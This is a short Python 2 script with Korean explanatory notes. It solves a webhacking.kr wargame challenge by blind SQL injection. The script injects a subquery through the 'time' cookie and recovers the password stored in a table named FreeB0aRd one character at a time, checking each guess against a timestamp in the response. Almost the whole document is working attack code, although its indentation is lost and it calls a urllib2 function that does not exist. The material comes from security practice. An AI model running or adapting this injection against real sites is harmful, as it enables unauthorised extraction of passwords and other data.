blind sql injection source

import re, urllib2

pw=""

my_cookie = "1"

url = "http://webhacking.kr/challenge/web/web-02"

cookieHeader= ""

for i in range(1, 11):

for j in range(33, 126):

req=urllib2.Request(url)

cookieHeader= "time=1234567890 and (select ascii(substring(password, {}, 1)) from FreeB0aRd)={}; PHPSESSID={}".format(i, j, my_cookie)

print cookieHeader

req.add_header('cookie', cookieHeader)

read=urllib2.urlopen(req).read()

print "-------------------------"

print "Successed that recved data!!"

print "######"

print read

find = re.findall("09:00:01", read)

if find:

print "Successed find to password"

print "######"

pw=pw+chr(j)

print pw

break

print "-------------------------"

print "Password: {}".format(pw)

urllib2.urlclose(req)

////////////////////////////////////////////

 ::FreeB0aRd 테이블에 존재하는 password 컬럼에 대해,

2.소스 설명  ::프로그램 동작을 보고 기능을 유추한 것

-req=urllib2.Request(url)

>해당 url에 대한 Request 패킷 생성

-req.add_header('cookie', cookieHeader)

>문자열 cookieHeader의 값을 cookie 헤더에 추가

-urllib2.urlopen(req).read()

>작성한 Request 패킷을 전송.

>read()

>>Responsed 패킷을 읽어옴.

 -re.findall(Dest, string)

>Dest에서 string에 해당하는 문자열이 있는지